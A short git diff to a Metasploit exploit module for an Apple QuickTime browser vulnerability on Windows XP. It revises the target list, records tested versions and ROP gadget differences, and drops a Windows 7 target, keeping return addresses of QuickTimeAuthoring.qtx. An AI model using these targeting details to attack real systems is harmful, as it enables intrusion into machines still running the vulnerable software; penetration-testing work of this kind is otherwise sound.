diff --git a/modules/exploits/windows/browser/apple_quicktime_marshaled_punk.rb b/modules/exploits/windows/browser/apple_quicktime_marshaled_punk.rb
index 28b8f8f5c7..0d928a27c5 100644
--- a/modules/exploits/windows/browser/apple_quicktime_marshaled_punk.rb
+++ b/modules/exploits/windows/browser/apple_quicktime_marshaled_punk.rb
@@ -69,14 +69,21 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Platform' => 'win',
 			'Targets'  =>
 				[
-					[ 'Apple QuickTime Player 7.6.7 on Windows XP SP3 with IE6',
+					# Tested OK:
+					#
+					# QT 7.6.6 + XP SP3 + IE8
+					# QT 7.6.7 + XP SP3 + IE6
+					#
+
+					# @eromange reports it doesn't work on 7.6.5
+					# - further investigation shows QuickTimeAuthoring.qtx changed / rop gadgets different
+
+					# QuickTimeAuthoring.qtx 7.6.7 is compiled w/DYNAMIC_BASE, so win7 is :(
+
+					[ 'Apple QuickTime Player 7.6.6 and 7.6.7 on Windows XP SP3',
 						{
 							'Ret' => 0x677a0000, # base of QuickTimeAuthoring.qtx
-						}
-					],
-					[ 'Apple QuickTime Player 7.6.7 on Windows 7 with IE8',
-						{
-							'Ret' => 0x6c890000, # base of QuickTimeAuthoring.qtx
+							#'Ret' => 0x67780000, # base of QuickTimeAuthoring.qtx v7.6.5
 						}
 					],
 				],